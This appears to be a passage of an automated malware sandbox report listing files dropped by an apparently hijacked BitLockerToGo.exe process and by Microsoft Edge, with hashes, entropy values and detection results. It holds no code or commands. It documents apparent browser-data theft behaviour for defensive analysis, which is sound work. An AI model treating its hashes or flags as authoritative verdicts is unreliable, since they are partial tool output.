                                                                                                                                                                                                                                                                                                                  Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "38829aa4-f57e-4fd8-bfd3-d094d57ae30f");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696493966);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696493970);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2650118817842442
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:384:KrJ/2qOB1nxCkMTSAELyKOMq+8QTQKC+CVum9:K0q+n0JT9ELyKOMq+8Q7K
                                                                                                                                                                                                                                                                                                                  MD5:DF83F659F3720BBAFAC1A4B03AF9BD9E
                                                                                                                                                                                                                                                                                                                  SHA1:AF9009341AE5840DE26E744F35D3E77499CB2701
                                                                                                                                                                                                                                                                                                                  SHA-256:256E9903D62C39069C93AE6871D9BE84354D638E8835A1E8619C14FEF933F9E0
                                                                                                                                                                                                                                                                                                                  SHA-512:057A1C2CF2AE715641234D1B7BF7FDB35B144DE228301DDDA17070C8A1BEAB3CBB791A2F7271E5F5D12E513AD4346C6716EE41D62296B8B2F6B657D89F630899
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):51200
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                                                                  MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                                                                  SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                                                                  SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                                                                  SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):5242880
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.03708713717387235
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxW/Hy4XJwvnzfXfYf6zfTfN/0DApVJCI:58r54w0VW3xW/bXWzvACzbJ0DApVJ
                                                                                                                                                                                                                                                                                                                  MD5:85D6E1D7F82C11DAC40C95C06B7B5DC5
                                                                                                                                                                                                                                                                                                                  SHA1:96EA790BA7A295D78AD5A5019D7EA5E9E8F4B0BD
                                                                                                                                                                                                                                                                                                                  SHA-256:D9AD18D2A91CB42FD55695B562D76337BBB4A6AEB45D28C4554297B4EE0DC800
                                                                                                                                                                                                                                                                                                                  SHA-512:5DD2B75138EFB9588E14997D84C23C8225F9BFDCEA6A2A1D542AD2C6728484E7E578F06C4BA238853EAD9BE5F9A7CCCF7B2B49A0583FF93D67F072F2C5165B14
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.1373607036346451
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                                                                                                                                                                                                                                                                  MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                                                                                                                                                                                                                                                                  SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                                                                                                                                                                                                                                                                  SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                                                                                                                                                                                                                                                                  SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):685392
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                                                                  MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                                                                  SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                                                                  SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                                                                  SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                  • Filename: E89hSGjVrv.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):608080
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                                                                  MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                                                                  SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                                                                  SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                                                                  SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                  Joe Sandbox View:
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: E89hSGjVrv.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):450024
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                                                                                  MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                                                                                  SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                                                                                  SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                                                                                  SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2046288
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                                                                                  MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                                                                                  SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                                                                                  SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                                                                                  SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):257872
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                                                                                  MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                                                                                  SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                                                                                  SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                                                                                  SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):80880
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                                                                  MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                                                                  SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                                                                  SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                                                                  SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):44170
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.0905293170759895
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4ktCLmZtxtR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynjtGhOxqQoRTuiVIos
                                                                                                                                                                                                                                                                                                                  MD5:172CA269327D025CFEF762207219D2CA
                                                                                                                                                                                                                                                                                                                  SHA1:B1C083180A984AD1188AD033F14C405DE5842CE1
                                                                                                                                                                                                                                                                                                                  SHA-256:F6E78CBF693CAD0EB08938C6700C8958BAA254F6C77A7B1558C5BF9846899800
                                                                                                                                                                                                                                                                                                                  SHA-512:FE3FC566E75C959A17F132DD97AB5857C9D931C7DDFA7C98128A1388635D9CB61304F79A1C0074F75184264C9F14743FC362943FE798EC3E5C07D4939C0768BA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):44723
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.096139010608138
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xp/LmZikZ8QUoD+PJKwWE7RTupzKscDX//NPC1os:z/Ps+wsI7yOGZaKoRTuiVIos
                                                                                                                                                                                                                                                                                                                  MD5:987654CAB3FD0BF770E2B36B6072A745
                                                                                                                                                                                                                                                                                                                  SHA1:7A70AFC6BC9808ABBBBEF90162EFA8F60F59B32E
                                                                                                                                                                                                                                                                                                                  SHA-256:5435E9248C9319CCB7211AFFC5C159D1EA3737846DDB1D6908C3640CA5F3D8E6
                                                                                                                                                                                                                                                                                                                  SHA-512:5C5D56FBB23E67059EAD80DC3FC0AD5D2F75B7FE2AFF6158E316B6D4E7DDBD63F9D30DAC436E6D9E7603BB84BA5613D7BDE0AB92B6798FB7B34AC0286CD5EFD4
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                                  Size (bytes):44641
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.095733887872189
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kL/LmZikZSwucDPb38JKwWE7RTupzKscDX//NPC1os:z/Ps+wsI7ynUZEKoRTuiVIos
                                                                                                                                                                                                                                                                                                                  MD5:FDE831B66FCEC5E35605AAABC3BAF6E2
                                                                                                                                                                                                                                                                                                                  SHA1:8A5525F9F32358928242C4DCE0AE70F2AFA6D5E6
                                                                                                                                                                                                                                                                                                                  SHA-256:F4498C49327F153120A9950E1A86A37A8DCD020E19C0D2875D6A5A73091D02C7
                                                                                                                                                                                                                                                                                                                  SHA-512:DCEDD64C95F37DA9B78382B012481106D6E6C3D43C45B0ACF5D84719B2C9D60730E3E0D1F2CFE658DAE5A28142500EBDC7DE3AB38CCEF006984BF75A83C7480C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.04727269386388711
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:JZCJa/0pqtmsnOAQpYiJPi6VBK/7+HfgHXybc7IKMEYTwgh0MNSsyzRQcD/OKfJs:X2a/0ctLMd44LphhIVfDfJ08T2RGOD
                                                                                                                                                                                                                                                                                                                  MD5:6BAC925AE386035413BD905DB41C598C
                                                                                                                                                                                                                                                                                                                  SHA1:CA97FDA25E122F2935CF51E7B1F168D61DF53909
                                                                                                                                                                                                                                                                                                                  SHA-256:65A65B0D5A2D1DD3D22F30A22629DF709E3C7C0F3F80FD1C4ACCEF55702F84C9
                                                                                                                                                                                                                                                                                                                  SHA-512:AEA541FE99684517ACB11CD67EF832C433134968A27644BC8886725D3990FD3F5BE638A5F3A4926F6953FBEAA95A912403AA198B0438C6D46DDD7817C52B806D
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.4275461847564229
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:Qg4vos/zGX0WnhdMBwMPs7pY/UDFM4az9pW2bWDq3Xg1HFD:OvoZZMBwOs7ptxrR2bWDq3XaHB
                                                                                                                                                                                                                                                                                                                  MD5:159569B0913F252CEBCCEFC7469175FC
                                                                                                                                                                                                                                                                                                                  SHA1:621D3576FAB058E9F79CD8D665DB84B59DECA075
                                                                                                                                                                                                                                                                                                                  SHA-256:FF0CCBC905386345C98D13AD8E4B3D7BEEAEF9FEC632428EA7E57FA476A819E2
                                                                                                                                                                                                                                                                                                                  SHA-512:384E1C13479774F05069CEF872A0303BBE84529C5F8AEEBC5B3F34282D65B163E7B1C6B4C593D6CE7959D6B392179C403B0459C3280DE58DF4B7DC7F90CA25EE
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):280
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.195531555605597
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:FiWWltlMpKoKuNoDZbkDURSHxig5ABVP/Sh/JzvNKIUBUhX9USWXQPWllt:o1GVKCoD4Hxi2ABVsJDZYeulX+W/
                                                                                                                                                                                                                                                                                                                  MD5:B43C738AB1422F16D60B4C4B49CC7DF2
                                                                                                                                                                                                                                                                                                                  SHA1:98C07F5F5E4F25C2BC0B2B5E6A3A2245F7D18215
                                                                                                                                                                                                                                                                                                                  SHA-256:C28208A8D5052C44515333D67BE35E9900BB0C1E68DECF8C8CDC8DB67DE51E4C
                                                                                                                                                                                                                                                                                                                  SHA-512:07A58D40C283CBDB4063D1EF70EBDAFF8E84CB47F530B939FA25195F9652976CB3E439F315A18D732128E60B5F2856DC1CA42E814DE45F2301DC143A0D22798E
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):35114
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.555993605134716
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:y6dPpjWPFuM/fWa8F1+UoAYDCx9Tuqh0VfUC9xbog/OV4mzLYrwy2StqKpXtu6:y6dPpjWPIWfWau1ja5KLJy2S8WtF
                                                                                                                                                                                                                                                                                                                  MD5:84AFA2172145E6690AE4686DBE872C0B
                                                                                                                                                                                                                                                                                                                  SHA1:69825CAEDA064A58F7BB8AD9DD354A78E83AC023
                                                                                                                                                                                                                                                                                                                  SHA-256:4193DE3F42FE85ACB6ED47C13C8D0CD63EED288CA6EFEEC4FED265DB71E65ED9
                                                                                                                                                                                                                                                                                                                  SHA-512:1BB9402C4985EC5C2393B8317C641964C0A9E2FA786F2988F7B32F448E363BEFD0CB632F74600A75F95E69D3EC72F96BF466BA446FFE3482322487D8C32C82FC
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
